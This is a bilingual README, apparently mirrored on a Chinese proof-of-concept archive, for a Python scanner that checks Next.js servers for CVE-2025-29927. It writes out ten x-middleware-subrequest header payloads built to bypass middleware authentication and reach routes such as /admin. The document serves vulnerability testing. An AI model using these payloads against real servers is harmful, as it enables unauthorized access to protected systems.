关联漏洞
描述
Este script verifica la vulnerabilidad CVE-2025-29927 en servidores Next.js, probando múltiples cargas en la cabecera x-middleware-subrequest para detectar accesos no autorizados.
介绍
CVE-2025-29927 Checker
📌 Introduction
This script checks for the CVE-2025-29927 vulnerability in Next.js servers by testing multiple payloads in the x-middleware-subrequest header to detect unauthorized access.
❓ What is CVE-2025-29927?
CVE-2025-29927 is a vulnerability that allows security restrictions in Next.js to be bypassed, granting access to sensitive routes without authentication.
⚙️ How the Script Works
🔹 1. Importing Libraries
The script uses:
🛠️ argparse - for argument handling.
🌐 requests - to send HTTP requests.
⏳ time - for pauses between tests.
🎨 colorama - to format console output with colors.
🔹 2. Payload List
The script tests multiple payloads in x-middleware-subrequest, designed to bypass security restrictions. Example:
"src/middleware:nowaf:src/middleware:src/middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:nowaf:src/middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:src/middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:middleware:middleware:nowaf:src/middleware:pages/_middleware",
"middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:middleware:middleware:middleware:middleware:pages/_middleware",
"src/middleware:middleware:middleware:nowaf:middleware:pages/_middleware",
"src/middleware:middleware:middleware:middleware:nowaf:middleware:pages/_middleware"
🔹 3. Sensitive Routes
The script analyzes responses for paths such as:
/admin, /dashboard, /settings, /private, /config
🔹 4. Scanning Process
✅ Displays a banner in the console.✅ Sends HTTP requests with different payloads.✅ Checks if the server uses Next.js.✅ Detects access to sensitive routes and reports vulnerabilities.
🔹 5. Error Handling
The script handles exceptions to prevent interruptions due to connection failures.
🚀 Usage Example
Run the script with:
python script.py -t https://example.com/api/auth
📢 Disclaimer
This tool is for ethical testing and authorized use only. Unauthorized use against third-party systems is illegal.
===================ESPAÑOL===================
CVE-2025-29927 Checker
📌 Introducción
Este script verifica la vulnerabilidad CVE-2025-29927 en servidores Next.js, probando múltiples payloads en el encabezado x-middleware-subrequest para detectar accesos no autorizados.
❓ ¿Qué es CVE-2025-29927?
CVE-2025-29927 es una vulnerabilidad que permite eludir restricciones de seguridad en Next.js, otorgando acceso a rutas sensibles sin autenticación.
⚙️ Cómo Funciona el Script
🔹 1. Importación de Librerías
El script utiliza:
🛠️ argparse - para el manejo de argumentos.
🌐 requests - para enviar solicitudes HTTP.
⏳ time - para pausas entre pruebas.
🎨 colorama - para formatear la salida en la consola con colores.
🔹 2. Lista de Payloads
El script prueba múltiples payloads en x-middleware-subrequest, diseñados para evadir restricciones de seguridad. Ejemplo:
"src/middleware:nowaf:src/middleware:src/middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:nowaf:src/middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:src/middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:middleware:middleware:nowaf:src/middleware:pages/_middleware",
"middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:middleware:middleware:middleware:middleware:pages/_middleware",
"src/middleware:middleware:middleware:nowaf:middleware:pages/_middleware",
"src/middleware:middleware:middleware:middleware:nowaf:middleware:pages/_middleware"
🔹 3. Rutas Sensibles
El script analiza las respuestas en busca de rutas como:
/admin, /dashboard, /settings, /private, /config
🔹 4. Proceso de Escaneo
✅ Muestra un banner en la consola.✅ Envía solicitudes HTTP con diferentes payloads.✅ Verifica si el servidor usa Next.js.✅ Detecta accesos a rutas sensibles e informa vulnerabilidades.
🔹 5. Manejo de Errores
El script maneja excepciones para evitar interrupciones debido a fallos de conexión.
🚀 Ejemplo de Uso
Ejecutar el script con:
python script.py -t https://example.com/api/auth
📢 Aviso Legal
Esta herramienta es para pruebas éticas y uso autorizado únicamente. El uso no autorizado en sistemas de terceros es ilegal.
文件快照
[4.0K] /data/pocs/3c3fadb81e638452a2222bd830de8042ca55a996
├── [3.3K] CVE-2025-29927_Scanner.py
├── [ 60K] demo_localhost.png
├── [ 20K] demo_real.png
└── [4.7K] README.md
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。